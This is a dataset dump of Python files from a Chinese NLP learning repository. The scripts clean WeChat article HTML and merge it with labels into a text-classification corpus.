"is_vendor": false, "language": "Python", "length_bytes": 5396, "license_type": "no_license", "max_line_length": 191, "num_lines": 150, "path": "/cleardata/extractor.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "import re\n\nimport cchardet\nfrom bs4 import BeautifulSoup\n\nzh_punctuation = r\"\"\"#$&'()*,!?。:;<=>^_`§№☆★○●◎◇◆□■△▲▼※→←↑↓〓#&@^_⊙●○①⊕◎Θ⊙¤㊣▂ ▃ ▄ ▅ ▆ ▇ █ █ ■ ▓ 回 □ 〓≡ ╝╚╔ ╗╬ ═ ╓ ╩ ┠ ┨┯ ┷┏ ┓┗ ┛┳⊥『』┌♀◆◇◣◢◥▲▼△▽⊿{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟…‧﹏\"\"\"\nen_punctuation = r\"\"\"\"#$%&'()*.,:;<=>^_`{|}\\[\\]\\!\\?~-\"\"\"\npunctuation = zh_punctuation + en_punctuation\n\n\nclass Extractor():\n def __init__(self):\n pass\n\n def extract_html(self, html):\n soup = BeautifulSoup(html, 'html.parser')\n span_list = soup.find_all('span', style=lambda value: value and \"rgb(255, 255, 255)\" not in value)\n content = ''\n for i, text in enumerate(span_list):\n text = self.redundant_remove(text.get_text().strip('\\n'))\n if 'end' in text.lower():\n break\n if max([len(s) for s in text.split(' ')]) > 50:\n continue\n content = ' '.join([content, text])\n return content\n\n def symbol_filter(self, text):\n text = re.sub(\"[A-Za-z]\", \"x\", text)\n text = re.sub('\\d', \"1\", text)\n text = re.sub(\"[\" + punctuation + \"]\", \" \", text)\n return text\n\n def stop_words_remove(self, text):\n text = text.split()\n res = ''\n for s in text:\n if re.search('(点击|蓝字|关注|订阅|推送)', s):\n continue\n else:\n res = ' '.join((res, s))\n res = ' '.join(res.split())\n return res\n\n def redundant_remove(self, text):\n text = self.symbol_filter(text)\n text = self.stop_words_remove(text)\n return text\n\n def filter(self, text):\n if '点击' in text:\n idx = text.index('点击')\n text = text[:idx]\n if '阅读原文' in text:\n idx = text.index('阅读原文')\n text = text[:idx]\n # length = len(text.strip())\n # if length > 100:\n # if length > 500:\n # text = text[130:]\n # else:text = ''\n return text\n\n def process(self, html):\n content = self.extract_html(html)\n content = self.filter(content)\n return content\n\n\nextractor = Extractor()\n\n\ndef encoder(data_path):\n f = open(data_path, 'rb').read()\n encoding = cchardet.detect(f)['encoding']\n return encoding\n\n\ndef get_corpus(html, label):\n doc_encoding = encoder(html)\n label_encoding = encoder(label)\n\n with open(html, 'r', encoding=doc_encoding) as f:\n lines = f.readlines()\n lines = [line for line in lines[1:] if line.strip() != '']\n ids = [line.split('\",')[0].replace('\"', '') for line in lines]\n texts = [extractor.process(line.split('\",')[1].replace('\"', '')) for line in lines]\n\n with open(label, 'r', encoding=label_encoding) as f:\n label_lines = f.readlines()\n label_lines = [line for line in label_lines[1:] if line.strip() != '']\n label_ids = [line.split('\",')[0].replace('\"', '') for line in label_lines]\n labels = [line.split('\",')[1].replace('\"', '') for line in label_lines]\n\n doc_dict = dict(zip(ids, texts))\n label_dict = dict(zip(label_ids, labels))\n\n corpus = []\n for id in doc_dict.keys():\n text = doc_dict.get(id)\n label = label_dict.get(id)\n one = label + '\\t' + text + '\\n'\n corpus.append(one)\n return corpus\n\n\ndef batch_corpus(htmls, labels):\n if not isinstance(htmls, list):\n raise ValueError('htmls should be a list object')\n if not isinstance(labels, list):\n raise ValueError('labels should be a list object')\n if len(htmls) != len(labels):\n raise Exception('The length of htmls and labels should be equal')\n\n l = len(htmls)\n all_corpus = []\n for i in range(l):\n html = 
htmls[i]\n label = labels[i]\n corpus = get_corpus(html, label)\n all_corpus.extend(corpus)\n\n return all_corpus\n\n\nif __name__ == '__main__':\n import os\n\n base_path1 = 'C:/Users/ywwl/Desktop/文章/7/'\n base_path2 = 'C:/Users/ywwl/Desktop/文章/8/'\n htmls1 = ['html0.csv', 'html1.csv', 'html2.csv', 'html3.csv', 'html4.csv']\n labels1 = ['label0.csv', 'label1.csv', 'label2.csv', 'label3.csv', 'label4.csv']\n htmls2 = ['html1.csv', 'html2.csv', 'html3.csv', 'html4.csv', 'html5.csv', 'html6.csv']\n labels2 = ['label1.csv', 'label2.csv', 'label3.csv', 'label4.csv', 'label5.csv', 'label6.csv']\n htmls1 = [os.path.join(base_path1, i) for i in htmls1]\n labels1 = [os.path.join(base_path1, i) for i in labels1]\n htmls2 = [os.path.join(base_path2, i) for i in htmls2]\n labels2 = [os.path.join(base_path2, i) for i in labels2]\n\n corpus1 = batch_corpus(htmls1, labels1)\n corpus2 = batch_corpus(htmls2, labels2)\n\n path3 = 'C:/Users/ywwl/Desktop/文章/alldata3.txt'\n with open(path3, 'r', encoding='utf8') as f:\n lines = f.readlines()\n corpus1.extend(corpus2)\n corpus1.extend(lines)\n ok_lines = [i for i in corpus1 if len(i.split('\\t')[1].strip()) > 50]\n with open('C:/Users/ywwl/Desktop/文章/alldata.txt', 'w', encoding='utf8') as f:\n f.write(''.join(ok_lines))\n" }, { "alpha_fraction": 0.44697248935699463, "alphanum_fraction": 0.45211008191108704, "avg_line_length": 35.33333206176758, "blob_id": "e483d12cdd37cf8639b2c64499a549bdb8733f5d", "content_id": "ba0d5964bfda9608b2217c340f86ca1eb620661f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2743, "license_type": "no_license", "max_line_length": 91, "num_lines": 75, "path": "/cleardata/standardiz_data_from_raw_fomat.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\nfrom pathlib import Path\n\nimport cchardet\n\nfrom utils.html_parser import parser_external_html\n\n\nclass Data:\n def __init__(self, title='', content='', labels=''):\n self.title = title\n self.content = content\n self.labels = labels\n\n\ndef detect_code_type(file):\n return cchardet.detect(open(file, 'rb').read())['encoding']\n\n\ndef integrate(dir_path):\n datum = {}\n root = Path(dir_path)\n for sub_dir in root.iterdir():\n if sub_dir.is_dir():\n print(sub_dir)\n for file in sub_dir.iterdir():\n print(\"processing file: \", file.name)\n if file.suffix == '.csv':\n code_type = detect_code_type(file)\n head_line = True\n for line in file.open(encoding=code_type):\n if head_line: # skip title\n head_line = False\n continue\n line = line.strip()\n if len(line) == 0: # skip blank line\n continue\n line = line[1:-2]\n fields = line.split('\",\"')\n if len(fields) < 2:\n print(\"file: %s\\nline: %s\" % (file.name, line))\n continue # malformed line, cannot be parsed into (id, value)\n if 'html' in file.name or '内容' in file.name:\n doc_id = fields[0]\n html = fields[1]\n content = parser_external_html(html)\n if not datum.get(doc_id, None):\n datum[doc_id] = Data(content=content)\n else:\n datum[doc_id].content = content\n elif 'label' in file.name or '标签' in file.name:\n doc_id = fields[0]\n labels = fields[1]\n if not datum.get(doc_id, None):\n datum[doc_id] = Data(labels=labels)\n else:\n datum[doc_id].labels = labels\n\n print(\"Total data num: \", len(datum))\n return datum\n\n\ndef write(datum, o_path):\n o_path = Path(o_path)\n with open(o_path, \"w\", encoding='utf8') as f:\n for _, data in datum.items():\n if data.labels and len(data.content) >= 30 and len(data.content.split()) >= 10:\n f.write(\"%s\\t%s\\t%s\\n\" % 
(data.labels, data.content, data.title))\n print(\"finished!\")\n\n\nif __name__ == '__main__':\n path = \"/Users/iron/Documents/wechat\"\n datum = integrate(path)\n write(datum, '/Users/iron/Documents/公众号项目/alldata.tsv')\n" }, { "alpha_fraction": 0.8518518805503845, "alphanum_fraction": 0.8518518805503845, "avg_line_length": 12.5, "blob_id": "24be084c5a4dfd26beeb1c06f5ee211d8884fd24", "content_id": "b627eea71f1dc164c5da44ce9c4f72b464cf6d5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "no_license", "max_line_length": 13, "num_lines": 2, "path": "/README.md", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# NlpLearning\nNatural language processing, from getting started to giving up\n" } ]
11
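The `one_hot` helper in the NlpLearning utility file above builds one-hot vectors with `Tensor.scatter_`, which writes a value into each row at the column named by an index tensor. Here is a minimal, self-contained sketch of the same pattern; the label values are illustrative, not taken from the repo:

```python
import torch

def one_hot(label, depth=10):
    # label: 1-D tensor of integer class indices, shape (N,)
    out = torch.zeros(label.size(0), depth)
    idx = label.view(-1, 1)                  # (N, 1) column of target columns
    out.scatter_(dim=1, index=idx, value=1)  # put a 1 at (row i, column label[i])
    return out

labels = torch.tensor([2, 0, 9])
print(one_hot(labels))  # rows 0, 1, 2 carry a 1 in columns 2, 0, 9
```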
Takox/PythonServerAlumno
https://github.com/Takox/PythonServerAlumno
7940d5148ad01b112bd52c860ddf30cc318c7280
40cb66be28d01ffd6a52a616e01577564c8f4f3b
18d3315a68fe631f91f3ddde64c541df41805f26
refs/heads/master
2020-04-18T09:33:15.353579
2019-02-22T10:19:24
2019-02-22T10:19:24
167,438,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7198697328567505, "alphanum_fraction": 0.7263843417167664, "avg_line_length": 33.14814758300781, "blob_id": "b7ba64e8a627c6b3097bd8e44035e2ad06732d16", "content_id": "a7e8695bd5562233f07300bcbd416e459902f84c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 921, "license_type": "no_license", "max_line_length": 78, "num_lines": 27, "path": "/alumnoapp/views.py", "repo_name": "Takox/PythonServerAlumno", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom .models import Alumnos\nfrom .serializers import AlumnosSerializers\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n\nclass AlumnosViewSet(viewsets.ModelViewSet):\n queryset = Alumnos.objects.all()\n serializer_class = AlumnosSerializers\n\n def delete(self, request, pk, format=None):\n alumno = self.get_object()\n alumno.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def put(self, request, pk, format=None):\n alumno = self.get_object()\n serializer = AlumnosSerializers(alumno, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)" }, { "alpha_fraction": 0.8121212124824524, "alphanum_fraction": 0.8121212124824524, "avg_line_length": 65, "blob_id": "de88c674a000a8fec7b18324a274c28428153fac", "content_id": "340cd14763c10c9e516f5bfb4dc339022aac2a59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 331, "license_type": "no_license", "max_line_length": 155, "num_lines": 5, "path": "/README.md", "repo_name": "Takox/PythonServerAlumno", "src_encoding": "UTF-8", "text": "# PythonServerAlumno\n\nREST server developed with the Django framework and Python to manage the data of a database hosted both locally and in the cloud (Google App Engine)\n\nTo update the database models, use the inspectdb command or makemigrations -> migrate, depending on where the modification originated.\n" }, { "alpha_fraction": 0.7257384061813354, "alphanum_fraction": 0.7257384061813354, "avg_line_length": 33, "blob_id": "07cc9ef017a8c4418b753b020763a2f131606f12", "content_id": "ca7ebdb52fd90ed6abc7a14b31a10bbb12d0e588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 74, "num_lines": 7, "path": "/alumnoapp/serializers.py", "repo_name": "Takox/PythonServerAlumno", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Alumnos\n\nclass AlumnosSerializers(serializers.ModelSerializer):\n class Meta:\n model = Alumnos\n fields = '__all__' # exposes every model field, enabling full CRUD" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.7341772317886353, "avg_line_length": 19.75, "blob_id": "5fcb1eb6756dfa1315274f2ca0bcdb45586667cd", "content_id": "3040a2753e69628b7c59438164af56f87cde08df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 79, "license_type": "no_license", "max_line_length": 28, "num_lines": 4, "path": "/requirements.txt", "repo_name": "Takox/PythonServerAlumno", "src_encoding": "UTF-8", "text": "Django==2.1.6\ndjangorestframework == 3.9.1\ndjango-cors-headers \nPyMySQL==0.9.2\n" } ]
4
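The `AlumnosViewSet` in the record above only becomes reachable once it is registered with a router; the project's own `urls.py` is not included in this record, so the wiring below is an assumption rather than the repo's actual configuration, but it is the standard Django REST Framework pattern for exposing a `ModelViewSet`:

```python
# urls.py -- hypothetical wiring, not present in the record above
from django.urls import include, path
from rest_framework.routers import DefaultRouter

from alumnoapp.views import AlumnosViewSet

router = DefaultRouter()
# Generates list/retrieve/create/update/destroy routes under /alumnos/
router.register(r'alumnos', AlumnosViewSet)

urlpatterns = [
    path('', include(router.urls)),
]
```

With a router in place, the hand-written `delete` and `put` methods are largely redundant, since `ModelViewSet` already provides `destroy` and `update` actions.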
vijpandaturtle/robotic-arm-pick-and-place
https://github.com/vijpandaturtle/robotic-arm-pick-and-place
3ff70440f1b570da2d055d7f352a0c10ef5611b1
ec02f0fb309ebe26f68d214d9050ce9a7cd4461d
a271ecda96fd5579e4dd032b48676ee303cb5fd8
refs/heads/master
2020-12-03T02:30:19.164444
2017-11-06T13:58:23
2017-11-06T13:58:23
95,946,524
4
3
null
2017-07-01T06:27:31
2017-07-11T16:15:05
2017-08-15T15:36:54
Python
[ { "alpha_fraction": 0.4831751585006714, "alphanum_fraction": 0.5442622900009155, "avg_line_length": 40.99275207519531, "blob_id": "06f75ff72add50cb144839d3b28630a7a62e9337", "content_id": "02486aecd1855997b121b04b443db774c342380d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5795, "license_type": "no_license", "max_line_length": 157, "num_lines": 138, "path": "/IK_server.py", "repo_name": "vijpandaturtle/robotic-arm-pick-and-place", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport rospy\nimport tf\nfrom kuka_arm.srv import *\nfrom trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint\nfrom geometry_msgs.msg import Pose\nfrom mpmath import *\nfrom sympy import *\n\n# Define Modified DH Transformation matrix\ndef transform(q, a, d, alpha):\n    transform = Matrix([ [cos(q), -sin(q), 0, a], [sin(q)*cos(alpha), cos(q)*cos(alpha), -sin(alpha), -sin(alpha)*d], [sin(q)*sin(alpha), cos(q)*sin(alpha),\n cos(alpha), cos(alpha)*d], [0, 0, 0, 1] ])\n    return transform\n\n\ndef handle_calculate_IK(req):\n rospy.loginfo(\"Received %s eef-poses from the plan\" % len(req.poses))\n if len(req.poses) < 1:\n print \"No valid poses received\"\n return -1\n else:\n # Initialize service response\n joint_trajectory_list = []\n # Define DH param symbols\n q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8')\n d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8')\n alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6 = symbols('alpha0:7')\n a0, a1, a2, a3, a4, a5, a6 = symbols('a0:7')\n # Define additional symbols for roll, pitch and yaw for the end-effector orientation\n r, p, y = symbols('r p y')\n # Rotation Matrices for x,y and z consisting of end effector orientation parameters\n R_x = Matrix([[1, 0, 0], [0, cos(r), -sin(r)], [0, sin(r), cos(r)]])\n R_y = Matrix([[cos(p), 0, sin(p)], [0, 1, 0], [-sin(p), 0, cos(p)]])\n R_z = Matrix([[cos(y), -sin(y), 0], [sin(y), cos(y), 0], [0, 0, 1]])\n\n # Joint angle symbols\n # Modified DH params\n s = { d1 : 0.75, alpha0 : 0, a0 : 0,\n d2 : 0, alpha1 : -pi/2, a1 : 0.35, q2 : q2 - pi/2,\n d3 : 0, alpha2 : 0, a2 : 1.25,\n d4 : 1.50, alpha3 : -pi/2, a3 : -0.054,\n d5 : 0, alpha4 : pi/2, a4 : 0,\n d6 : 0, alpha5 : -pi/2, a5 : 0,\n d7 : 0.303, alpha6 : 0, a6 : 0, q7 : 0\n }\n print \"1 after dh\"\n\n # Create individual transformation matrices\n T0_1 = transform(q1, a0, d1, alpha0)\n T0_1 = T0_1.subs(s)\n T1_2 = transform(q2, a1, d2, alpha1)\n T1_2 = T1_2.subs(s)\n T2_3 = transform(q3, a2, d3, alpha2)\n T2_3 = T2_3.subs(s)\n T3_4 = transform(q4, a3, d4, alpha3)\n T3_4 = T3_4.subs(s)\n T4_5 = transform(q5, a4, d5, alpha4)\n T4_5 = T4_5.subs(s)\n T5_6 = transform(q6, a5, d6, alpha5)\n T5_6 = T5_6.subs(s)\n T6_G = transform(q7, a6, d7, alpha6)\n T6_G = T6_G.subs(s)\n print \"2 after transforms\"\n\n # Transformation to find end-effector position\n T0_G = T0_1*T1_2*T2_3*T3_4*T4_5*T5_6*T6_G\n print \"3 before loop\"\n\n for x in xrange(0, len(req.poses)):\n print \"4 inside loop\"\n # IK code starts here\n joint_trajectory_point = JointTrajectoryPoint()\n # Extract end-effector position and orientation from request\n # px,py,pz = end-effector position\n # roll, pitch, yaw = end-effector orientation\n px = req.poses[x].position.x\n py = req.poses[x].position.y\n pz = req.poses[x].position.z\n\n (roll, pitch, yaw) = tf.transformations.euler_from_quaternion(\n [req.poses[x].orientation.x, req.poses[x].orientation.y,\n req.poses[x].orientation.z, req.poses[x].orientation.w])\n\n # Calculate joint angles using 
Geometric IK method\n # Calculating positions of the wrist center\n\n end_effector_pos = Matrix([px, py, pz])\n R0_6 = R_z*R_y*R_x\n\n R_correction = R_z.subs(y,pi)*R_y.subs(p,-pi/2)\n R0_6 = R0_6 * R_correction\n R0_6 = R0_6.subs({'r': roll, 'p': pitch, 'y': yaw})\n\n wrist_center = end_effector_pos - (0.303)*R0_6[:,2]\n\n Wx, Wy, Wz = wrist_center[0], wrist_center[1], wrist_center[2]\n\n side_a = 1.50\n side_b = sqrt(pow(sqrt(Wx**2 + Wy**2) - 0.35,2) + pow((Wz - 0.75),2))\n side_c = 1.25\n angle_a = acos((side_b**2 + side_c**2 - side_a**2)/(2*side_b*side_c))\n angle_b = acos((side_a**2 + side_c**2 - side_b**2)/(2*side_a*side_c))\n angle_c = acos((side_a**2 + side_b**2 - side_c**2)/(2*side_a*side_b))\n # Finding the first three joint angles using trigonometry\n theta1 = atan2(Wy, Wx)\n theta2 = pi/2 - angle_a - atan2((Wz - 0.75), sqrt(Wx**2 + Wy**2) - 0.35)\n theta3 = pi/2 - angle_b + 0.036\n\n # Finding the last three joint angles\n R0_3 = T0_1[0:3,0:3]*T1_2[0:3,0:3]*T2_3[0:3,0:3]\n R0_3 = R0_3.evalf(subs={q1:theta1, q2:theta2, q3:theta3})\n # Using the matrix containing last three transforms to calculate last three thetas\n R3_6 = R0_3.inv('LU')*R0_6\n\n theta4 = atan2(R3_6[2,2], -R3_6[0,2])\n theta5 = atan2(sqrt(R3_6[0,2]**2 + R3_6[2,2]**2), R3_6[1,2])\n theta6 = atan2(-R3_6[1,1], R3_6[1,0])\n\n # Populate response for the IK request\n # In the next line replace theta1,theta2...,theta6 by your joint angle variables\n \t joint_trajectory_point.positions = [theta1, theta2, theta3, theta4, theta5, theta6]\n \t joint_trajectory_list.append(joint_trajectory_point)\n\n rospy.loginfo(\"length of Joint Trajectory List: %s\" % len(joint_trajectory_list))\n return CalculateIKResponse(joint_trajectory_list)\n\n\ndef IK_server():\n # initialize node and declare calculate_ik service\n rospy.init_node('IK_server')\n s = rospy.Service('calculate_ik', CalculateIK, handle_calculate_IK)\n print \"Ready to receive an IK request\"\n rospy.spin()\n\nif __name__ == \"__main__\":\n IK_server()\n" }, { "alpha_fraction": 0.6256316900253296, "alphanum_fraction": 0.6958169341087341, "avg_line_length": 49.16901397705078, "blob_id": "34bc5614eeb5012789b3e0f5947f93aad335b11a", "content_id": "4f7f8ebeb4a8ffbc0cb05268497eeaa3cd044f81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7133, "license_type": "no_license", "max_line_length": 394, "num_lines": 142, "path": "/writeup_template.md", "repo_name": "vijpandaturtle/robotic-arm-pick-and-place", "src_encoding": "UTF-8", "text": "## Project: Kinematics Pick & Place\n---\n\n\n**Steps to complete the project:** \n\n\n1. Set up your ROS Workspace.\n2. Download or clone the [project repository](https://github.com/udacity/RoboND-Kinematics-Project) into the ***src*** directory of your ROS Workspace. \n3. Experiment with the forward_kinematics environment and get familiar with the robot.\n4. Launch in [demo mode](https://classroom.udacity.com/nanodegrees/nd209/parts/7b2fd2d7-e181-401e-977a-6158c77bf816/modules/8855de3f-2897-46c3-a805-628b5ecf045b/lessons/91d017b1-4493-4522-ad52-04a74a01094c/concepts/ae64bb91-e8c4-44c9-adbe-798e8f688193).\n5. Perform Kinematic Analysis for the robot following the [project rubric](https://review.udacity.com/#!/rubrics/972/view).\n6. 
Fill in the `IK_server.py` with your Inverse Kinematics code.\n\n\n[//]: # (Image References)\n\n[image1]: ./images/zero_config.png\n[image2]: ./images/walthrough_diagram.png\n[image3]: ./images/matrix.png\n[image4]: ./images/result.png\n\n## [Rubric](https://review.udacity.com/#!/rubrics/972/view) Points\n### Here I will consider the rubric points individually and describe how I addressed each point in my implementation. \n\n---\n### Writeup / README\n\n#### 1. Provide a Writeup / README that includes all the rubric points and how you addressed each one. You can submit your writeup as markdown or pdf. \n\nYou're reading it!\n\n### Kinematic Analysis\n#### 1. Run the forward_kinematics demo and evaluate the kr210.urdf.xacro file to perform kinematic analysis of Kuka KR210 robot and derive its DH parameters.\n\nThe forward kinematics code was fairly easy to implement and involved filling in the values in the DH parameter table. The urdf file contains the position of each joint relative to its preceding joint, so the parameters were very intuitive.\nIn order to calculate the DH parameters I used the sketch of the arm in its zero configuration.\n\n![alt text][image1]\n\n\n\n#### 2. Using the DH parameter table you derived earlier, create individual transformation matrices about each joint. In addition, also generate a generalized homogeneous transform between base_link and gripper_link using only end-effector(gripper) pose.\n\n***DH Parameter Table***\n---\n\n| Joint | α(i-1) | a(i-1) | θ(i) | d(i) |\n|---|---|---|---|---|\n| 1 | 0 | 0 | θ1 | 0.75 |\n| 2 | -pi/2 | 0.35 | θ2 - pi/2 | 0 |\n| 3 | 0 | 1.25 | θ3 | 0 |\n| 4 | -pi/2 | - 0.054 | θ4 | 1.50 |\n| 5 | pi/2 | 0 | θ5 | 0 |\n| 6 | -pi/2 | 0 | θ6 | 0 |\n| Gripper Frame (End-effector) | 0 | 0 | 0 | 0.303 |\n\nThis is the homogeneous transform matrix that I used to perform operations for forward kinematics, i.e. to transform from the base frame to the gripper frame. This equation gives the matrix as per the DH parameter convention:\n\n![alt text][image3]\n\nThe matrix above is obtained by performing alternate rotations and translations about the DH parameters **alpha**, **a**, **theta** and **d** respectively. Now, to obtain transforms between consecutive frames, I simply substituted the corresponding values from the DH parameter table.\n\nThese are the individual transform matrices based on the DH parameter table.\n\n```python\nT0_1 = [[cos(q1), -sin(q1), 0, 0],\n [sin(q1), cos(q1), 0, 0],\n [0, 0, 1, 0.750000000000000],\n [0, 0, 0, 1]]\n\nT1_2 = [[sin(q2), cos(q2), 0, 0.350000000000000],\n [0, 0, 1, 0],\n [cos(q2), -sin(q2), 0, 0],\n [0, 0, 0, 1]]\n\nT2_3 = [[cos(q3), -sin(q3), 0, 1.25000000000000],\n [sin(q3), cos(q3), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]]\n\nT3_4 = [[cos(q4), -sin(q4), 0, -0.0540000000000000],\n [0, 0, 1, 1.50000000000000],\n [-sin(q4), -cos(q4), 0, 0],\n [0, 0, 0, 1]]\n\nT4_5 = [[cos(q5), -sin(q5), 0, 0],\n [0, 0, -1, 0],\n [sin(q5), cos(q5), 0, 0],\n [0, 0, 0, 1]]\n\nT5_6 = [[cos(q6), -sin(q6), 0, 0],\n [0, 0, 1, 0],\n [-sin(q6), -cos(q6), 0, 0],\n [0, 0, 0, 1]]\n\nT6_G = [[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0.303000000000000],\n [0, 0, 0, 1]]\n```\n\nThe total transform from the base_frame to the gripper_frame is simply the product of all the consecutive transform matrices. For this purpose I used the sympy library, which has an inbuilt Matrix class for matrix operations.\n\n```python\nT0_G = T0_1*T1_2*T2_3*T3_4*T4_5*T5_6*T6_G\n```\n\n#### 3. 
Decouple Inverse Kinematics problem into Inverse Position Kinematics and inverse Orientation Kinematics; doing so derive the equations to calculate all individual joint angles.\n\nThis was the hardest part of the project for me. It took a lot of time to visualize the thetas, especially theta2 and theta3. These thetas are represented as q1, q2, q3... in the DH parameter table. Here is a diagram that aided me in visualization.\n\n![alt text][image2]\n\nThe axes represented in this image correspond to the sqrt(x^2 + y^2) and z axes. The triangle between joints 2, 3 and 5 can be evaluated by projecting it onto this frame. As per these axes, and using the diagram provided in section 1 for reference, side_a and side_c can be easily found. As for side_b, the given co-ordinates are sqrt(Wx^2 + Wy^2) and Wz, so the formula is:\n\n```python\nside_b = sqrt(pow(sqrt(Wx**2 + Wy**2) - 0.35,2) + pow((Wz - 0.75),2))\n```\nThe terms 0.35 and 0.75 are the distances to be subtracted because the co-ordinates of the wrist are calculated with respect to the base frame.\nFinding the angles of the triangle is easy with the use of the cosine rule. Using the above parameters, I calculated the values of thetas 1-3. For deriving thetas 4-6, I used the equations provided in the Euler angles of a rotation matrix section. Below are the equations for thetas 1-6:\n\n```python\n# Angles for end-effector position\ntheta1 = atan2(Wy, Wx)\ntheta2 = pi/2 - angle_a - atan2((Wz - 0.75), sqrt(Wx**2 + Wy**2) - 0.35)\ntheta3 = pi/2 - angle_b + 0.036\n# Angles for end-effector orientation\ntheta4 = atan2(R3_6[2,2], -R3_6[0,2])\ntheta5 = atan2(sqrt(R3_6[0,2]**2 + R3_6[2,2]**2), R3_6[1,2])\ntheta6 = atan2(-R3_6[1,1], R3_6[1,0])\n```\n\n### Project Implementation\n\n#### 1. Fill in the `IK_server.py` file with properly commented python code for calculating Inverse Kinematics based on previously performed Kinematic Analysis. Your code must guide the robot to successfully complete 8/10 pick and place cycles. Briefly discuss the code you implemented and your results.\n\nThe inverse kinematics code was fairly easy once I was able to visualize the sides of the triangle formed by joints 2, 3 and 5. These use the x and y co-ordinates along with correction terms to adjust the position of the frame, because the wrist center is calculated with respect to the base frame. A brief explanation of my analysis of the IK problem can be found under rubric section 3.\nAlthough the angles are calculated accurately, there is room for improvement, because I have not provided multiple solutions for each angle. Doing this would improve my solution of the IK problem.\nI ran the simulation three times, because it kept crashing, and completed 2/3 cycles successfully. Below is a screenshot of my arm in simulation.\n\n![alt text][image4]\n" } ]
2
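The cosine-rule angle computations in `IK_server.py` above are easy to get wrong by a single sign, so a quick numeric sanity check is worth having: the three interior angles of the joint-2/3/5 triangle must sum to pi. The sketch below uses illustrative side lengths, not values computed from the robot:

```python
from math import acos, isclose, pi

# Illustrative side lengths in the roles of side_a / side_b / side_c
side_a, side_b, side_c = 1.50, 1.80, 1.25

angle_a = acos((side_b**2 + side_c**2 - side_a**2) / (2 * side_b * side_c))
angle_b = acos((side_a**2 + side_c**2 - side_b**2) / (2 * side_a * side_c))
angle_c = acos((side_a**2 + side_b**2 - side_c**2) / (2 * side_a * side_b))

# Interior angles of a triangle sum to pi; a '+' where a '-' belongs breaks this.
assert isclose(angle_a + angle_b + angle_c, pi)
print(angle_a, angle_b, angle_c)
```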
rachelcourtney/Dublin_Bus
https://github.com/rachelcourtney/Dublin_Bus
751d3bdc95cc9a2749dd878f1d268f5462184083
a37d51c09b7ee62a7080193af806c9094a7e99a1
c507912d3967ab94e80ac177d4650bee31408690
refs/heads/main
2023-07-12T00:33:04.818311
2021-08-21T09:46:21
2021-08-21T09:46:21
381,866,677
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.682285726070404, "alphanum_fraction": 0.682285726070404, "avg_line_length": 31.25, "blob_id": "117a68eead84772ed6524ce34b1f5cbdb7c0b71e", "content_id": "dd14d317d1c6e64f243caa58ebe80d278e4668fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1750, "license_type": "no_license", "max_line_length": 102, "num_lines": 56, "path": "/Dublin_Bus/Bus/views.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.core import serializers\nimport json\nfrom .models import Stop, WeatherPrediction\nfrom .busmodels import get_prediction\nfrom .gtfsrealtime import get_arrivals\nfrom users.models import favourite\nfrom django.conf import settings\nfrom django.db.models import Max\n\n\n# Create your views here.\ndef index(request):\n favourites_json = serializers.serialize(\"json\", favourite.objects.filter(user_id=request.user.id))\n bus_stops_json = serializers.serialize(\"json\", Stop.objects.all())\n lastDate = WeatherPrediction.objects.aggregate(Max('dt'))\n context = {\n 'bus_stops': bus_stops_json,\n 'favourites': favourites_json,\n 'last_time': lastDate['dt__max'],\n 'MAP_API_KEY': settings.MAP_API_KEY\n }\n if request.method == 'POST':\n favourite_id = request.POST.get('favourite_id')\n try:\n context['journey'] = favourite.objects.get(id=favourite_id)\n except favourite.DoesNotExist:\n pass\n return render(request, 'Bus/index.html', context)\n\n\n# handle request for stop_data\ndef fetch_arrivals(request):\n if request.method == \"POST\":\n stop_pk = json.loads(request.body)\n data = get_arrivals(stop_pk)\n return JsonResponse(data)\n else:\n return redirect('index')\n\n\n# handle parameters for predictions\ndef send_to_model(request):\n if request.method == \"POST\":\n model_params = json.loads(request.body)\n prediction = {}\n prediction['current_pred'] = get_prediction(model_params)\n return JsonResponse(prediction)\n else:\n return redirect('index')\n\n\ndef twitter(request):\n return render(request, 'Bus/twitter.html')\n" }, { "alpha_fraction": 0.581105649471283, "alphanum_fraction": 0.5956091284751892, "avg_line_length": 36.01639175415039, "blob_id": "a153f717236cfbd420f3a7d1f268f5462184083", "content_id": "665960caed467ef011adc3bc4cd63fafda2c8371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 